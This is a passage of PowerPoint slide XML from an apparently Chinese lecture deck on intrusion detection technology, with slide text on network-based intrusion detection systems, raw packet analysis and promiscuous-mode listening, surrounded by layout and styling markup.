            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="组合 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0402F17D-9F88-4B2E-A2AA-6923F05BD2EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="矩形: 圆角 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650FD5F4-700F-4B0F-A2B8-16032AC000BF}"/>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8F3D8D06-0624-458B-A28D-DE6AA2A8DE2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04</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0A859A2D-CD96-4333-A77B-BDB862C2EA42}"/>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设计和部署</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83ECB501-4561-4A8B-88BE-E5161D7F9B2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="5220000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="24" name="组合 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242A2424-D0A6-4827-88BE-67EAB3DBF146}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26" name="矩形: 圆角 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ECDEF9F-D729-4403-B8DA-D4E751BBA199}"/>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8214CB29-1AB2-4F17-9C41-BEA3D489A22A}"/>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05</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257C772-5D23-4601-A412-371CC7099EA0}"/>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发展趋势</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="标题 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BB32422-F32E-444F-8DBA-2CC4A9ADFB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>讲 入侵检测技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301022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720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effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基于网络的入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>NIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endPar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nvGrpSpPr>
          <p:cNvPr id="38" name="组合 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1505342" y="2158626"/>
            <a:ext cx="5911215" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="9309" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="792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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>分析</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>网络流量、网络数据包和协议</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="组合 39"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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1497021" y="2702968"/>
            <a:ext cx="6317615" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="9949" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="856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使用原始网络包作为数据包</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="组合 19"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>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2" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9174"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3" name="组合 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1520875" y="3233275"/>
            <a:ext cx="6772910" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10666" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10016" y="3080"/>
              <a:ext cx="9283"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400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>运行在随机模式下的网络适配器监听通信</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="组合 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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12" name="矩形: 圆角 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1526713" y="2263846"/>
            <a:ext cx="6729730" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C3E8F6">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0" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{920F1E3A-1619-14BA-006C-8763B533A143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6576824" y="5139998"/>
            <a:ext cx="115647" cy="646061"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMagneticDisk">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F9978F"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0"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123" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C8E5223-A24E-3C5B-621B-DAFA0A06ED85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8591600" y="3273728"/>
            <a:ext cx="2139472" cy="3288629"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Freeform 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F15AE2-120A-C189-A96D-2E1DE8E143E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4205994" y="5459879"/>
            <a:ext cx="1572078" cy="377941"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T3" fmla="*/ 0 h 717"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T9" fmla="*/ 0 h 717"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T17" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T18" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T19" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T20" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T21" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T22" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T23" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T24" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T25" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T26" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T27" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T28" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T29" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T30" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T31" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T32" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T33" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T34" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T35" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T36" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T37" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T38" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T39" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T40" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T41" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T42" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T43" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T44" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T45" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T46" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T47" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T48" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T49" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T50" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T51" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T52" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T53" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T54" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T55" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T56" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T57" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T58" fmla="*/ 0 w 1057"/>
              <a:gd name="T59" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T60" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T61" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T62" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T63" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T64" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T65" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T66" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T67" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T68" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T69" fmla="*/ 2147483646 h 717"/>
              <a:gd name="T70" fmla="*/ 2147483646 w 1057"/>
              <a:gd name="T71" fmla="*/ 2147483646 h 7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7"/>
              <a:gd name="T109" fmla="*/ 0 h 717"/>
              <a:gd name="T110" fmla="*/ 1057 w 1057"/>
              <a:gd name="T111" fmla="*/ 717 h 7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5B6976"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="C5E2FF"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="5B6976"/>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wrap="square" lIns="99966" tIns="49983" rIns="99966" bIns="49983">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D03CD71B-BF81-4BDB-5F37-945100F8C03C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4414142" y="5418168"/>
            <a:ext cx="1264913" cy="408719"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="99966" tIns="49983" rIns="99966" bIns="49983">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="992188" fontAlgn="auto">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="C0C0C0"/>
                </a:outerShdw>
              </a:effectLst>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="126" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF80CA41-56E0-6D92-A106-6DDE61EC34F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6314648" y="3971050"/>
            <a:ext cx="1010032" cy="1332786"/>
            <a:chOff x="0" y="624"/>
            <a:chExt cx="1392" cy="1920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="127" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE2C171-496D-D4F7-4011-017CB3989BC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="624"/>
              <a:ext cx="1392" cy="1920"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 17815"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DDDDDD"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>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142" name="Line 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FD2623F-8D9D-4139-9BD5-B2EB2B27CA93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="1152"/>
              <a:ext cx="1143"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44" name="Line 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64CB6F0B-CA58-F477-4A65-B8A93C33512C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="1440"/>
              <a:ext cx="1143"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45" name="Line 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6BC03BC-D116-EFA4-3E19-96CC9EA46AB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="1728"/>
              <a:ext cx="1143"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46" name="Line 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5ED77C9-14A4-7399-4317-EFC226918442}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="2016"/>
              <a:ext cx="1143"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47" name="Line 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78EE106-AA18-12F0-7540-E39E889297BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="2304"/>
              <a:ext cx="1143"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grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="148" name="Object 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC4BD8B9-8BA0-22B1-1BF0-1D720182E179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2603078" y="5278473"/>
          <a:ext cx="1498594" cy="1188997"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6352" name="Clip" r:id="rId6" imgW="3277824" imgH="2598524" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId6" imgW="3277824" imgH="2598524" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="148" name="Object 95">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC4BD8B9-8BA0-22B1-1BF0-1D720182E1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078" y="5278473"/>
                        <a:ext cx="1498594" cy="1188997"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Text Box 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2C4D517-36AC-F389-D327-C996548406EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6387175" y="4105473"/>
            <a:ext cx="785437" cy="302262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
